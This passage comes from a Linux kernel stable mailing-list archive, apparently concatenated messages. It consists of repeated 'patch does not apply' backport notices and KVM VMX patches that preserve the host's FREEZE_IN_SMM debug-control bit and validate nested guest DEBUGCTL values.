* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081233-clang-reusable-6ef9@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 6.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.15.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081232-language-safehouse-4f99@gregkh' --subject-prefix 'PATCH 6.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081226-sublease-shoptalk-bc18@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081225-unsettled-hardener-28aa@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
